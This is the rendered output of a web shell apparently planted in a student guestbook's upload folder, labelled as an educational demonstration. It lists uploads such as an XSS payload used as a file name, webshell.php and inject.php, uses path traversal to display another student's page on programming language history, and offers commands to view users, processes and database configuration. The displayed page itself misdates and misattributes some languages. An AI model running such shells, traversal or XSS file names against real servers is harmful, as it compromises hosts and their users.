🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/TechnoWire/programmeertalen.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>programming languages</title>
    <link rel="stylesheet" href="programmertalen.css">
    <link rel="shortcut icon" type="image/x-icon" href="images/TechnoWire_.ico" />
</head>

<body>
    <div class="header" style="max-width: 100%;">
        <a href="index.html">
            <div> <img class="pic" src="images\TechnoWire_logo.png">
        </a>
    </div>
    </div>


    <div>
        <h1 class="program_info">languages history</h1>
    </div>

    <p class="program-info">The history of programming languages is an interesting journey that spans years.
        It's a story about Improvement, collaboration and the ongoing quest to make<br> computing more accessible and
        simpler.
        Here is a brief timeline of the major Highlights in the History of Programming Languages</p>

    <div id="sidebar">
        <div class="nav-bar">
            <li><a href="Hall of fame.html">
                    <p class="navbar-1">Hall of Fame</p>
                </a></li>

            <li><a href="Silicon valley.html">
                    <p class="navbar-2">Silicon valley</p>
                </a></li>



            <li><a href="programmeertalen.html">
                    <p class="navbar-3">Program languages</p>
                </a></li>

        </div>
    </div>

   
<div class="hamburger">&#9776;</div>


<div class="mobile-menu" id="mobileMenu">
    <a href="index.html">Home</a>
    <a href="Hall of fame.html">Hall of Fame</a>
    <a href="Silicon valley.html">Silicon valley</a>
    <a href="programmeertalen.html">Program languages</a>
</div>


   <script>
    document.querySelector('.hamburger').addEventListener('click', function() {
        const mobileMenu = document.getElementById('mobileMenu');
        if (mobileMenu.style.display === 'block') {
            mobileMenu.style.display = 'none';
        } else {
            mobileMenu.style.display = 'block';
        }
    });
</script>



    <style>
        @import url('https://fonts.googleapis.com/css2?family=Jost:wght@200;300;400&display=swap');
    </style>
    
    <section class="design-section">
        <div class="timeline">

          
            <div class="timeline-empty">
            </div>

       
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class="timeline-component timeline-content">
                <h3>1940</h3>
                <p>Name: Assembly Language<br>
                    Maker: john backus<br><br>
                    Assembly language is the world's first programming language.
                    a low-level programming language that has limited connections to the
                    architecture of a computer's central processing unit.</p>
                <img class="asm-pic" src="images\Assembly Language.png">
            </div>

            <div class="timeline-component timeline-content">
                <h3>1957</h3>
                <p>
                    Name: fortran<br>
                    Maker: john backus<br><br>
                    Fortran is one of the oldest programming languages still in use
                    Fortran focuses on performing calculations with speed and accuracy.
                </p>
                <img class="fort-pic" src="images/Fortran-logo.jpg">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class="timeline-empty">
            </div>

            <div class="timeline-empty">
            </div>

            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class=" timeline-component timeline-content">
                <h3>1959</h3>
                <p>Name: cobol<br>
                    Maker: grace hopper<br><br>
                    Cobol is a programming language from the 1960s that is mainly used in business
                    environments. Cobol is easier to use and can be used on multiple types of computers.</p>
                <img class="cobal-pic" src="images/COBOL.png">
            </div>

            <div class=" timeline-component timeline-content">
                <h3>1958</h3>
                <p>Name: Lisp<br>
                    Maker: John McCarthy<br><br>
                    Lisp is Known for symbolic processing and AI applications and it is still in common use.</p>
                <img class="lisp-pic" src="images/Lisp.png">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class="timeline-empty">
            </div>


            <div class="timeline-empty">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class=" timeline-component timeline-content">
                <h3>1969</h3>
                <p>Name: C<br>
                    Makers: Dennis Ritchie and Bell Labs<br><br>
                    C is now today very relative a lot of applications including Microsoft Windows, run on C.</p>
                <img class="c-pic" src="images/C logo.png">
            </div>


            <div class=" timeline-component timeline-content">
                <h3>1972</h3>
                <p>Name: C++<br>
                    Maker: Bjarne Stroustrup<br><br>
                    C++ is a widely-used, multi-paradigm programming language that builds upon the
                    foundations of the C programming language. and it has since become one of the most popular and
                    programming.</p>
                <img class="c-picutre" src="images/c-plus-plus-logo.png">
            </div>

            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>

            <div class="timeline-empty">
            </div>
            <div class="timeline-empty">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>

            <div class=" timeline-component timeline-content">
                <h3>1991</h3>
                <p>Name: python<br>
                    Maker: Guido van Rossum<br><br>
                    Python is a very popular and widely used programming language known for its
                    simplicity, readability and versatility.</p>
                <img class="python-pic" src="images/phyton.png">


            </div>
            <div class=" timeline-component timeline-content">
                <h3>1995</h3>
                <p>Name: Java<br>
                    Maker: James Gosling<br><br>
                    Java originated in the early 1990s in a small Sun Microsystems company led by James Gosling.
                    That company's mission was: "make something cool". In the early years, the company focused
                    on software for set-top boxes.</p>
                <img class="java-pic" src="images/Java.jpg">

            </div>

            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class="timeline-empty">
            </div>
            <div class="timeline-empty">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class=" timeline-component timeline-content">
                <h3>1995</h3>
                <p>Name: JavaScript<br>
                    Maker: Brendan Eich<br><br>
                    When JavaScript was developed, Netscape was the web browser used by almost everyone.
                    It was not yet possible to include code in a web page that is executed by the browser.
                    This so-called client-side scripting offers a lot of extra possibilities, so there was a great need
                    for it.</p>
                <img class="js-pic" src="images/javascript-logo.png">


            </div>

            <div class=" timeline-component timeline-content">
                <h3>1995</h3>
                <p>Name: Ruby<br>
                    Maker: Yukihiro Matsumoto<br><br>
                    Ruby is a dynamic, object-oriented programming language
                    known for its style and ease of use.</p>
                <img class="ruby-pic" src="images/Ruby.png">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class="timeline-empty">
            </div>
            <div class="timeline-empty">
            </div>
            <div class="timeline-middle">
                <div class="timeline-circle"></div>
            </div>
            <div class=" timeline-component timeline-content">
                <h3>2014</h3>
                <p>Name: Swift<br>
                    Maker: Chris Lattner<br><br>
                    Swift is specially maked for apple swift is Designed for iOS,
                    macOS, watchOS,tvOS and app development.</p>
                <img class="swift-pic" src="images/swift.png">

    </section>


    <a href="index.html">
        <p class="back-button" style="max-width: 170px;">Go back</p>
    </a>

</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!